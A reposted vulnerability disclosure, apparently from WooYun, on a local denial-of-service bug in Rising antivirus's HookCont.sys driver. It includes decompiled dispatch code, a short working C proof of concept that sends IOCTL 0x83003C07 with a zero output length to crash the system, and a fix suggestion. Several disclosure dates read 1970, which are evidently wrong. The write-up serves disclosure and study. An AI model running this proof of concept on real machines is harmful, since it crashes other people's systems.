瑞星 HookCont.sys <= 24.0.0.5 驱动本地拒绝服务漏洞

最新推荐文章于 2024-10-17 09:23:36 发布
最新推荐文章于 2024-10-17 09:23:36 发布
阅读量3.2k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188639
版权

漏洞详情

披露状态:

2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-26: 细节向公众公开

简要描述:

瑞星 HookCont.sys <= 24.0.0.5 驱动程序派遣例程中,对IoControlCode为0x83003C07的处理中,对UserBuffer检查中,使用ProbeForWrite函数不当造成本地拒绝服务漏洞。

详细说明:

void __stdcall DriverDispatch(struct _DEVICE_OBJECT *a1, PIRP Irp)
{
  PIRP v2; // edx@2
  PVOID UserBuffer; // edi@4
  unsigned int IoControlCode; // esi@4
  struct _IRP::$::$::$::$A02EC6A2CE86544F716F4825015773AC::_IO_STACK_LOCATION *pIrpStack; // esi@4
  SIZE_T OutputBufferLength; // ST18_4@4
  int v7; // eax@25
  HANDLE *Type3InputBuffer; // [sp+10h] [bp-24h]@4
  SIZE_T InputBufferLength; // [sp+14h] [bp-20h]@4
  if ( a1 == dword_115AC )                      // hookmail
  {
    v2 = Irp;
    ++v2->CurrentLocation;
    v2->Tail.Overlay.CurrentStackLocation = (struct _IRP::$::$::$::$A02EC6A2CE86544F716F4825015773AC::_IO_STACK_LOCATION *)((char *)v2->Tail.Overlay.CurrentStackLocation + 36);
    IofCallDriver(DeviceObject, Irp);
    JUMPOUT(*(unsigned int *)loc_10F11);
  }
  pIrpStack = Irp->Tail.Overlay.CurrentStackLocation;
  Type3InputBuffer = (HANDLE *)*((_DWORD *)pIrpStack + 4);
  UserBuffer = Irp->UserBuffer;
  InputBufferLength = *((_DWORD *)pIrpStack + 2);
  OutputBufferLength = *((_DWORD *)pIrpStack + 1);
  JUMPOUT((unsigned int)UserBuffer, (unsigned int)MmUserProbeAddress, *(unsigned int *)loc_10EF2);
  JUMPOUT(
    (unsigned int)((char *)UserBuffer + *((_DWORD *)pIrpStack + 1)),
    (unsigned int)MmUserProbeAddress,
    *(unsigned int *)loc_10EF2);
  ProbeForRead(*((const void **)pIrpStack + 4), InputBufferLength, 1u);
  ProbeForWrite(UserBuffer, OutputBufferLength, 1u);
  IoControlCode = *((_DWORD *)pIrpStack + 3);
  if ( IoControlCode == 0x83003C07 )
  {
    if ( !*((_BYTE *)P + 11004) )
    {
      if ( InputBufferLength >= 4 )
      {
        v7 = sub_105AA(P, *Type3InputBuffer);
        if ( v7 )
        {
          *(_DWORD *)UserBuffer = v7;
          Irp->IoStatus.Information = 4;
        }
        *((_BYTE *)P + 11005) = 0;
        JUMPOUT(*(unsigned int *)loc_10EF9);
      }
    }
  }
//省略部分代码。。。


从瑞星的DriverDispatch处理,可以看出其对UserBuffer虽然做了严格的MmUserProbeAddress比较检查,也做了ProbeForWrite探测,但是使用ProbeForWrite函数不当!因为处理过程中相信了用户输入的OutputBufferLength,那么只要用户输入的OutputBufferLength为0,就可以躲过ProbeForWrite检查。
最终在 *(_DWORD *)UserBuffer = v7; 这句中发生了内存访问错误,导致拒绝服务。

漏洞证明:

void Test() 
{ 
	DWORD dw;
	HANDLE hDevice; 
	DWORD InputBuffer[64]={0}; 
	DWORD outputBuffer[64]={0};  
	char * deviceName="\\\\.\\HookCont";
	DWORD ioControlCode=0x83003C07; 
	//得到设备指针 
	hDevice=CreateFile(deviceName,GENERIC_READ|GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_SYSTEM,0);
	if(hDevice==INVALID_HANDLE_VALUE)
	{ 
		displayError("打开设备出错!"); 
		return ;
	}   
	MyOutputDebugString("CreateFile %s ok! hDevice=%08X\n",deviceName,hDevice);
	//准备数据 
	InputBuffer[0]=(DWORD)hDevice; //给一个句柄即可
	//出发漏洞
	if(!DeviceIoControl(hDevice, 
		ioControlCode,
		InputBuffer , 
		4, 
		(PVOID)(0x7fff0000),
		0, 
		&dw,0))
	{
		displayError("DeviceIoControl failed!"); 
	} 
	//关闭设备句柄
	CloseHandle(hDevice);  
}

修复方案:

建议瑞星驱动中不要相信用户输入的OutputBufferLength,而使用自己需要写入的长度作为ProbeForWrite的第二个参数(即长度)。本驱动中,应该是sizeof(DWORD).

版权声明:转载请注明来源 shineast@乌云

Sword-heart
关注
瑞星杀毒软件被曝高危漏洞
x0002的专栏
01-29 379
1月27日消息 波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞,使木马病毒能轻易获得瑞星用户的系统控制权。国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到黑客攻击,数千万瑞星用户将丧失对木马病毒的防御能力,并将导致国内大批政府与企业内网的信息安全面临严重威胁。曝光者说,瑞星杀毒软件的这两个漏洞涉及瑞
关于windows驱动中的IO_STACK_LOCATION
要把所有那些负面的信息当做对自身行为的评价,而不是对自身价值的评判。
06-04 719
理解IO_STACK_LOCATION驱动入门的一个重要知识点,该结构体是理解驱动工作过程的核心知识之一。闲话不多时,直接看代码,看完下面几段windows源码,你要还不能理解,直接来找我。
windows内核开发学习笔记十七:IRP 和 IO_STACK_LOCATION 的交互
jyl_sh的专栏
04-15 1906
windows内核开发学习笔记十七:IRP 和 IO_STACK_LOCATION 的交互 前面两篇学习笔记分别介绍了IRP和IO_STACK_LOCATION,整个设备栈来处理这个IRP,但是每个设备都应该有自己的参数信息,这个参数信息就是通过IO_STACK_LOCATION 来保管的,那么IRP是怎么保管IO_STACK_LOCATION的呢?本文我们来分析一下IRP和IO_STACK_LOCATION交互作用的整个流程。 I/O manager ---> ...
IRP和IO_STACK_LOCATION
keepdoingit的专栏
07-12 3672
当一个应用程序调用函数去操作某个设备时,比如调用createFile,deviceIOControl,等等时,I/O管理器为此函数创建一个IRP数据结构对象和一个IRP_STACK_LOCATION数据结构对象数组。 (数组个数等于驱动程序堆栈上驱动的个数)。IRP对象中的数据成员是已经被填充好了的,其中有一个CurrentLocation是当前IRP_STACK_LOCATION堆栈单元的索引
瑞星杀毒软件爆出高危漏洞 可被利用为“抓鸡工具”
weixin_33877092的博客
07-05 129
1月27日消息 波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞,使***病毒能轻易获得瑞星用户的系统控制权。国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到******,数千万瑞星用户将丧失对***病毒的防御能力,并将导致国内大批政府与企业内网的信息安全面临严重威胁。  曝光者说,...
wdk tips (2): IO_STACK_LOCATION
weixin_30783629的博客
01-19 197
如前文所述,nt内核的驱动模型没有完全使用函数调用栈,而是自己山寨出来一个IO_STACK_LOCATION,里面保存了驱动调用序列。我们知道函数调用栈的push和pop都是编译器帮忙弄的,你甚至都可以在完全不了解内幕的前提下写代码,但是驱动开发不一样,调用序列要你自己去关心,何时入栈,何时出栈,栈内保留的什么内容,全部都要照顾好,否则BSOD就在前方不远等你。 与IO_STACK_L...
IRP和IO_STACK_LOCATION结构的关联
lixiangminghate的专栏
06-14 1794
IRP结构中的IRP!StackCount--IRP!CurrentLocation--IRP!CurrentStackLocation三个字段关系错综,仅以此文已做备忘。 //IRP结构后面接一个IO_STACK_LOCATION数组 typedef struct _IRP { CSHORT Type; USHORT Size; struct _MDL *MdlAddress
IRP概述
残酷な天使
04-21 707
<br /><br />原文地址:http://hi.baidu.com/noah1618/blog/item/a946368215a0e6b86d8119fc.html<br /><br /><br />一、简述<br />任何内核模式程序在创建一个IRP时,都同时创建了一个与之关联的IO_STACK_LOCATION结构数组:数组中的每个堆栈单元都对应一个将处理该IRP的驱动程序,另外还有一个堆栈单元供IRP的创建者使用。堆栈单元中包含该IRP的类型代码和参数信息以及完成函数的地址。IRP的Curren
IO_STACK_LOCATION与IRP的一点笔记
evil的心情站
09-23 804
IO_STACK_LOCATION和IRP算是驱动中两个很基础的东西,为了理解这两个东西,找了一点资料。 1. IRP可以看成是Win32窗口程序中的消息(Message),DEVICE_OBJECT可以看成是Win32窗口程序中的窗口(Window) 2. 任何内核模式程序在创建一个IRP时,同时还创建了一个与之关联的IO_STACK_LOCATION结构数组:数组中的每个堆
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
10-17 837
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1185
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络攻击的新趋势:勒索软件与零日漏洞
A526847的博客
10-12 992
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
常见的内网渗透思路及方法(包含示例)
xixixi7777的博客
10-11 1079
内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞
网络安全(黑客)——自学2024
2401_85026883的博客
10-13 955
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
0基础能不能转行做网络安全
HUANGXIN9898的博客
10-12 1154
网络安全是一个很大的概念,包含的东西也很多,比如 web安全,系统安全,二进制安全,无线安全、数据安全、移动安全、工控安全、渗透测试,ctf,售前售后,运维安全,样本分析、代码审计、密码算法、等保测评等等等等等等。有的人觉得我要入网络安全这个行业,那我必须会渗透测试,会各种黑客工具,能打CTF比赛,其实这是个误解,不可能人人都能成为黑客,人人都是韩商言。另外,多利用QQ、微信加安全群,群文件里也会有资料、工具分享,多跟别人交流,最好结交几个一起学网络安全的朋友,有问题互相讨论、互相鼓励,这样更有动力。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-11 1212
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值